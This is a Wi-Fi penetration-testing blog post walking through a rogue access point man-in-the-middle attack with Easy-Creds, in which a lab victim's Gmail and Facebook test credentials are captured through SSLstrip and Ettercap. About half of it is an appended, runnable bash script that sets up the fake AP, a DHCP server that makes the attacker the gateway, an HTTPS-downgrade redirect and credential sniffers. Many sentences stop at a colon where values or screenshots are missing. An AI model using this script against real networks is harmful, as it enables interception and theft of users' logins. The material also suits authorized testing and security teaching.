Monday, October 17, 2016

WI-FI PT / 4 - ATTACKS MAN-IN-THE-MIDDLE / 4.6 - Automating wireless MITM attacks with Easy-Creds

4.6 - Automating MITM attacks with Easy-Creds

- Easy-Creds is a bash script whose main value is that it bundles several well-known attack tools (Airbase-NG, dhcpd, SSLstrip, Ettercap, URL Snarf, Dsniff) behind one menu, so a complete rogue-AP Man-In-The-Middle attack can be configured and launched in an automated way instead of setting up each tool by hand.

- From "kali", the attacker machine, easy-creds is started:

- The first screen offers several option menus. Option 3 (FakeAP Attacks) is the one that creates a fake AP:

Within it, option 1 runs a simple static fake AP attack:

Easy-Creds asks whether a web session hijacking (sidejacking) attack should be included; it is not included in this case:

"kali" is connected by cable to the Internet through its eth0 interface:

"kali" is connected wirelessly to the victim "roch" through its wlan0 interface:

- The fake AP's ESSID is mitm:

The channel in use is 6:

The monitor interface created by airmon-ng is mon0:

- The MAC address won't be changed:

- The tunnel interface created by Airbase-NG is at0:

- No custom dhcpd.conf is supplied, so Easy-Creds generates one for the DHCP server it runs on the tunnel interface:

The network range used by "kali" and "roch" on that tunnel interface is

- From the DNS servers offered by the ISP, the first one is chosen:

Finally, the attack is launched:

- It is quite interesting to see how Easy-Creds runs all the well-known tools at once (Airbase-NG, a DMESG window that tails the system log for the DHCP lease messages, SSLstrip, Ettercap, URL Snarf, Dsniff). Once the configuration is finished, each tool gets its own window, displayed one on top of the next:
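The configuration collected above, as an added example that reproduces the Easy-Creds "FakeAP Attack Static" flow with the underlying commands (this is not Easy-Creds' own code and was not part of the original post). It keeps the post's choices (ESSID mitm, channel 6, eth0 upstream, wlan0 put into monitor mode as mon0, tunnel at0) and assumes two values the post does not show: the at0 network range 10.0.0.0/24 and the DNS server 8.8.8.8. By default it only prints the generated dhcpd.conf and the command sequence; it applies them only when run as root with FAKEAP_APPLY=1, on a network you are authorized to test.

```shell
#!/usr/bin/env bash
# Added example: the "FakeAP Attack Static" setup from the post written out as
# the individual commands Easy-Creds automates. NOT Easy-Creds' own code.
# ASSUMED (the post elides them): at0 range 10.0.0.0/24 and DNS 8.8.8.8.
# The remaining values are the choices made in the post.
set -u

ESSID="${ESSID:-mitm}"                 # fake AP name chosen in the post
CHANNEL="${CHANNEL:-6}"                # channel chosen in the post
UPSTREAM_IF="${UPSTREAM_IF:-eth0}"     # wired Internet-facing interface
WIFI_IF="${WIFI_IF:-wlan0}"            # wireless card facing the victim
MON_IF="${MON_IF:-mon0}"               # monitor interface airmon-ng creates
                                       # (newer Aircrack releases call it wlan0mon)
TUN_IF="${TUN_IF:-at0}"                # tap interface Airbase-NG creates
NETWORK="${NETWORK:-10.0.0.0/24}"      # ASSUMED: the post's range is not shown
DNS_SERVER="${DNS_SERVER:-8.8.8.8}"    # ASSUMED: the post uses the ISP's first DNS
SSLSTRIP_PORT="${SSLSTRIP_PORT:-10000}"

# "10.0.0.0/24" -> "10.0.0". Only x.y.z.0/24 ranges are handled; anything else
# is rejected rather than silently producing a wrong netmask.
net_prefix() {
  case "$1" in
    *.*.*.0/24) printf '%s' "${1%.0/24}" ;;
    *) echo "net_prefix: only x.y.z.0/24 ranges are supported: $1" >&2; return 1 ;;
  esac
}

# dhcpd.conf equivalent to the one Easy-Creds writes when no custom file is
# given: the attacker's at0 address is the first host and is handed out as the
# gateway, so every packet from the victim crosses the attacker machine.
gen_dhcpd_conf() {
  local p; p=$(net_prefix "$NETWORK") || return 1
  cat <<EOF
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet ${p}.0 netmask 255.255.255.0 {
  option routers ${p}.1;
  option subnet-mask 255.255.255.0;
  option domain-name-servers ${DNS_SERVER};
  range ${p}.100 ${p}.254;
}
EOF
}

# The command sequence, one tool per line, in dependency order. The iptables
# REDIRECT is what hands the victim's port-80 traffic to SSLstrip; Ettercap
# needs no ARP poisoning because all victim traffic already crosses at0.
gen_commands() {
  local p; p=$(net_prefix "$NETWORK") || return 1
  cat <<EOF
airmon-ng start ${WIFI_IF} ${CHANNEL}
airbase-ng -e "${ESSID}" -c ${CHANNEL} ${MON_IF}
ifconfig ${TUN_IF} ${p}.1 netmask 255.255.255.0 up
touch /var/lib/dhcp/dhcpd.leases
dhcpd -cf /tmp/dhcpd.conf ${TUN_IF}
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -o ${UPSTREAM_IF} -j MASQUERADE
iptables -t nat -A PREROUTING -i ${TUN_IF} -p tcp --dport 80 -j REDIRECT --to-port ${SSLSTRIP_PORT}
sslstrip -f -p -k -l ${SSLSTRIP_PORT}
ettercap -T -q -i ${TUN_IF}
urlsnarf -i ${TUN_IF}
dsniff -i ${TUN_IF}
EOF
}

# Dry run: print the generated configuration and the command sequence.
show_plan() {
  echo "# /tmp/dhcpd.conf for ${TUN_IF}:"; gen_dhcpd_conf
  echo "# commands (each long-running tool in its own terminal, as Easy-Creds does):"
  gen_commands
}

# Apply for real: root only. Long-running tools get their own xterm; at0 only
# exists while airbase-ng runs, so the short sleep lets it appear first.
apply_setup() {
  [ "$(id -u)" -eq 0 ] || { echo "apply_setup: must run as root" >&2; return 1; }
  gen_dhcpd_conf > /tmp/dhcpd.conf || return 1
  gen_commands | while IFS= read -r cmd; do
    case "$cmd" in
      airbase-ng*|sslstrip*|ettercap*|urlsnarf*|dsniff*) xterm -hold -e "$cmd" & sleep 2 ;;
      *) eval "$cmd" ;;
    esac
  done
}

if [ "${FAKEAP_APPLY:-0}" = "1" ]; then apply_setup; else show_plan; fi
```

Run it with no arguments to see the plan; `FAKEAP_APPLY=1 ./fakeap.sh` as root applies it. The REDIRECT to SSLstrip's port is the single rule responsible for the missing padlock later in the post: the victim's browser only ever talks plain HTTP to "kali", while SSLstrip speaks HTTPS to the real site.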

- At this point "kali", through Easy-Creds, waits until a user from the victim "roch" connects to mitm:

- Airbase-NG detects the association of "roch" (Client 28:C6:8E:63:15:6B) with the fake AP mitm:

Ettercap logs the DHCP ACK that the DHCP server (the dhcpd Easy-Creds started on "kali"'s at0 interface) sends to "roch", offering the IP=, the default gateway GW=, and DNS=

It can be verified that "roch", once connected to mitm, accepts those three parameters (IP, GW and DNS):

If the victim connects to the Internet, either to, or any other website, URL Snarf logs the requests immediately:

Now the client checks his e-mail account as usual. Because "kali" is the Man-In-The-Middle and SSLstrip is rewriting the HTTPS links into plain HTTP, the login page arrives over HTTP and no padlock, HTTPS or green URL bar is shown:

Ettercap captures the account name ( ) and the password (passwordPFM):

- Finally, to extend the demonstration, a Facebook test account is created:

       i) Email:
       ii) Password: passwordPFM

- If the client connected to the Facebook server normally (before the attack is launched), he would see the padlock and the green HTTPS bar at the URL, indicating that the connection is protected:

However, once the MITM attack has been launched, the URL bar changes its look: no more padlock or green HTTPS:

Again, Ettercap captures the credentials for the Facebook account: the e-mail address and the password passwordPFM:

If the attack is not carried out carefully, the browser may show the client a warning that the connection is not secure, because the certificate presented by the Man-In-The-Middle is not trusted. Sites that send HSTS, and browsers that have them preloaded (as is the case for Facebook and Gmail today), refuse plain HTTP altogether, so SSLstrip cannot downgrade them and the user gets an error page rather than a stripped login form:

- Of course, under no circumstances should the user click "Proceed anyway". However, according to statistics published by Google, many users actually ignore the warning and click "Proceed anyway" instead of "Back to safety".